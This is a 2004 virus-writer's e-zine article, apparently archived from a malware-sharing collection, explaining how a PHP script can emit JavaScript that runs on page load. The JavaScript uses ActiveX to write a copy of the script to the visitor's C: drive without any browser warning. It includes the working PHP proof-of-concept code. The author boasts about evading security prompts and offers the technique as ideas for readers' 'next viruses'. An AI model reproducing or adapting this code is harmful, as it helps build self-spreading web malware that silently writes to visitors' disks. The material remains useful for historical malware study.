,, MMP""MM""YMM `7MM P' MM `7 MM MM MMpMMMb. .gP"Ya MM MM MM ,M' Yb MM MM MM 8M"""""" MM MM MM YM. , .JMML. .JMML JMML.`Mbmmd' `7MMF' `7MF' `7MMF' `7MMF' `MA ,V MM MM VM: ,V `7M' `MF' MM MM .gP"Ya ,6"Yb.`7M' `MF'.gP"Ya `7MMpMMMb. MM. M' `VA ,V' MMmmmmmmMM ,M' Yb 8) MM VA ,V ,M' Yb MM MM `MM A' XMX MM MM 8M"""""" ,pm9MM VA ,V 8M"""""" MM MM :MM; ,V' VA. MM MM YM. , 8M MM VVV YM. , MM MM VF .AM. .MA..JMML. .JMML.`Mbmmd' `Moo9^Yo. W `Mbmmd'.JMML JMML. ,, ,, ,, .g8"""bgd `7MM `7MM mm db .dP' `M MM MM MM dM' ` ,pW"Wq. MM MM .gP"Ya ,p6"bo mmMMmm `7MM ,pW"Wq.`7MMpMMMb. MM 6W' `Wb MM MM ,M' Yb 6M' OO MM MM 6W' `Wb MM MM MM. 8M M8 MM MM 8M"""""" 8M MM MM 8M M8 MM MM `Mb. ,'YA. ,A9 MM MM YM. , YM. , MM MM YA. ,A9 MM MM `"bmmmd' `Ybmd9'.JMML..JMML.`Mbmmd' YMbmd' `Mbmo.JMML.`Ybmd9'.JMML JMML. -- Contact -- https://twitter.com/vxunderground vxug@null.net


  1. Intro Words
  2. The idea (Theory)
  3. The code
  4. Last Words

0) Intro Words

A 'Preprocessor language' is a web-based language, which has been done to run on a server, and only on the server. The results by the executed web-based preprocessor script (like PHP) file will be transfered to the Webpage, which can be seen by the user. That means, the user will never see the code of that script. As a result, the script can not harm the user in any way, because it is executed on the server, (and only there) and just the results are send to the user. This has been also written in VirusBulletin March/2001 in an article by Denis Zenlin & Mike Pavlushchik called 'PHP go the Script Viruses'. The article deals with the PHP.Pirus (29a#5) and PHP.NewWorld and the common PHP problem. A very important statement of the article: '... and it does not have the ability to spread to other Web sites or PCs of the visitors who view an HTML page containing a malicious PHP script. This last case is not possible simply because a user receives a pure HTML page with absolutely no script inside from the PHP processor...' Well, that's not true at all, which I will prove in this article. :)

1) The idea (Theory)

It is very true that the PHP code is executed on the server, and just on the server. And it returns just the pure HTML code. That made me think about that topic more intensive. Finally I got an idea: If the PHP script returns a HTML code, and HTML codes could contain '<script>' tags with viruses, it should be possible to make a PHP virus processed on the server, but affecting the client. I tried it with a simple JavaScript in the body, but it didn't work, because the JavaScript code will not executed directly. Why not? I don't really know, I think because the execution of the HTML is already after the returned JavaScript code. That made me feel strange: I know the code is there in the HTML (you can see the HTML code in your IE ;), but it isn't executed (=don't work). After alot of thinking I got the final idea: I let the JavaScript be a function in the <head>-tag and call it via <body language ... >. And this one worked.

OK, what we need:

A really quite cool side-effect is this one: Normally, if you have a Web-Page containing a JavaScript code, the user will get two warnings:

  1. The WinXP SP2 warning, that a script should be executed.
  2. The IE warning, that WScript should be used by the script.

After these two messages, the user will be that scared of the page, that (s)he will not accept execution of the script.

Now the side effect: If you use this technique, and somebody runs it, there are NO (!!!) warnings, error-messages or informations about the danger of script. It just will be executed, that's all. :)

2) The code

Well, now you should understand the idea, how it works (I hope so :D). Now let's move to the code! I've tested the code on my WinXP SP2 + IE 6.0 with PHP 5.0.2 on my computer (where I'm server + client) and on a www.host.sk domain, where I'm just a client. And, surprise/surprise, it worked anyway. ;) The following code will create a file called 'spth.php' on the harddisk C with it's own code, if a user (client) runs it. And most important: There will be NO warnings about the script. :) Now have a look at the code:


echo '<html><head>';
echo '<script language='.chr(34).'JavaScript'.chr(34).'>'.$nl;
echo 'function go(){'.$nl;
echo 'var fso=new ActiveXObject('.chr(34).'Scripting.FileSystemObject'.chr(34).')'.$nl;
echo 'var file=fso.CreateTextFile('.chr(34).'C:\\\spth.php'.chr(34).')'.$nl;
$cont=fread(fopen (__FILE__, 'r'),filesize(__FILE__));
echo 'file.Write(';
while ($i<strlen($cont)){
  echo 'String.fromCharCode('.ord($cont{$i}).')+';
echo chr(34).chr(34).')'.$nl;
echo 'file.Close()}'.$nl;
echo '</script></head>';$nl.$nl;

<body language="JavaScript" onload="go()"></body></html>

3) Last Words

This technique is a prove that PHP can affect the user (client), even many people denied it. Beside of the problem that PHP is not that secure, the technique is very dangerous because there are NO warnings, the script just works without any messange, and the user don't even recognize it. It would be able to make a fully virus with this technique, which infects the users HD, and (s)he would not recognize it. Therefore such a creature could be easiely get in the wild.

That result makes me happy, because two new things has been discovered. I hope I gave you with that article some help or maybe new ideas for your next viruses...

                                                        - - - - - - - - - - - - - - -
                                                          Second Part To Hell/[rRlf]  
                                                          written from november 2004
                                                        - - - - - - - - - - - - - - -